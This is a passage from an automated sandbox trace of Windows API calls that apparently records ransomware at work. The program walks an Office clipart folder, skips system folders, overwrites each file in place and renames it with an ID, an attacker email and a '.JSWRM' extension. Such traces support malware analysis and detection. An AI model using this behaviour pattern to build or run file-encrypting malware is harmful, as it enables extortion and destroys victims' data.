lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152626.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152626.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0084.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0084.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0084.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0084.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152626.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.247] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26248) returned 1 [0084.247] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6680) returned 0x24d210 [0084.247] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6680, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6680, lpOverlapped=0x0) returned 1 [0084.358] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.358] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6680, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6680, lpOverlapped=0x0) returned 1 [0084.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0084.359] CloseHandle (hObject=0x314) returned 1 [0084.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0084.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0084.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0084.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0084.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0084.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0084.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0084.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0084.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0084.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0084.359] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152626.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152626.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152626.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0084.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0084.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0084.360] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8d9e20, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe8d9e20, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe9261f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x785c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152628.WMF", cAlternateFileName="")) returned 1 [0084.360] lstrcmpiW (lpString1="J0152628.WMF", lpString2=".") returned 1 [0084.360] lstrcmpiW (lpString1="J0152628.WMF", lpString2="..") returned 1 [0084.360] lstrcmpiW (lpString1="J0152628.WMF", lpString2="...") returned 1 [0084.360] lstrcmpiW (lpString1="J0152628.WMF", lpString2="windows") returned -1 [0084.361] lstrcmpiW (lpString1="J0152628.WMF", lpString2="recovery") returned -1 [0084.361] lstrcmpiW (lpString1="J0152628.WMF", lpString2="perflogs") returned -1 [0084.361] lstrcmpiW (lpString1="J0152628.WMF", lpString2="documents and settings") returned 1 [0084.361] lstrcmpiW (lpString1="J0152628.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.361] lstrcmpiW (lpString1="J0152628.WMF", lpString2="system volume information") returned -1 [0084.361] lstrcmpiW (lpString1="J0152628.WMF", lpString2="msocache") returned -1 [0084.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0084.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152628.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152628.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152628.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0084.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0084.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152628.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152628.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152628.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0084.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0084.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0084.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0084.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152628.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.363] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30812) returned 1 [0084.363] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.363] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7850) returned 0x24d210 [0084.363] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7850, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7850, lpOverlapped=0x0) returned 1 [0084.367] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.367] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7850, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7850, lpOverlapped=0x0) returned 1 [0084.367] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0084.368] CloseHandle (hObject=0x314) returned 1 [0084.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0084.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0084.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0084.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0084.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.368] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0084.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.368] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0084.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0084.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0084.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0084.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0084.369] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152628.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152628.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152628.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0084.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0084.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0084.370] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8b3ab6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe8b3ab6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe8fff80, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8774, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152688.WMF", cAlternateFileName="")) returned 1 [0084.370] lstrcmpiW (lpString1="J0152688.WMF", lpString2=".") returned 1 [0084.370] lstrcmpiW (lpString1="J0152688.WMF", lpString2="..") returned 1 [0084.370] lstrcmpiW (lpString1="J0152688.WMF", lpString2="...") returned 1 [0084.370] lstrcmpiW (lpString1="J0152688.WMF", lpString2="windows") returned -1 [0084.370] lstrcmpiW (lpString1="J0152688.WMF", lpString2="recovery") returned -1 [0084.370] lstrcmpiW (lpString1="J0152688.WMF", lpString2="perflogs") returned -1 [0084.370] lstrcmpiW (lpString1="J0152688.WMF", lpString2="documents and settings") returned 1 [0084.370] lstrcmpiW (lpString1="J0152688.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.370] lstrcmpiW (lpString1="J0152688.WMF", lpString2="system volume information") returned -1 [0084.370] lstrcmpiW (lpString1="J0152688.WMF", lpString2="msocache") returned -1 [0084.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0084.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152688.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152688.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152688.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0084.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0084.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152688.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152688.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152688.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0084.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0084.370] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0084.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0084.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152688.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.371] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=34676) returned 1 [0084.371] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.371] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8770) returned 0x24d210 [0084.372] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8770, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8770, lpOverlapped=0x0) returned 1 [0084.458] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.459] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8770, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8770, lpOverlapped=0x0) returned 1 [0084.459] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0084.460] CloseHandle (hObject=0x314) returned 1 [0084.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0084.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0084.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0084.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0084.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0084.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0084.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0084.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0084.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0084.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0084.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0084.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0084.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0084.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0084.460] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152688.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152688.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152688.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0084.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0084.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0084.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0084.462] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe88d87c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe88d87c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe8fff80, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0152690.WMF", cAlternateFileName="")) returned 1 [0084.462] lstrcmpiW (lpString1="J0152690.WMF", lpString2=".") returned 1 [0084.462] lstrcmpiW (lpString1="J0152690.WMF", lpString2="..") returned 1 [0084.462] lstrcmpiW (lpString1="J0152690.WMF", lpString2="...") returned 1 [0084.462] lstrcmpiW (lpString1="J0152690.WMF", lpString2="windows") returned -1 [0084.463] lstrcmpiW (lpString1="J0152690.WMF", lpString2="recovery") returned -1 [0084.463] lstrcmpiW (lpString1="J0152690.WMF", lpString2="perflogs") returned -1 [0084.463] lstrcmpiW (lpString1="J0152690.WMF", lpString2="documents and settings") returned 1 [0084.463] lstrcmpiW (lpString1="J0152690.WMF", lpString2="$RECYCLE.BIN") returned 1 [0084.463] lstrcmpiW (lpString1="J0152690.WMF", lpString2="system volume information") returned -1 [0084.463] lstrcmpiW (lpString1="J0152690.WMF", lpString2="msocache") returned -1 [0084.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0084.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152690.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152690.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152690.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0084.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0084.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152690.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0084.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0152690.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0152690.WMF", lpUsedDefaultChar=0x0) returned 12 [0084.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0084.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0084.463] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0084.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0084.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0084.463] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0084.464] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152690.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152690.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0084.465] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1268) returned 1 [0084.465] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.465] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4f0) returned 0x230a00 [0084.465] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x4f0, lpNumberOfBytesRead=0x345e89c, 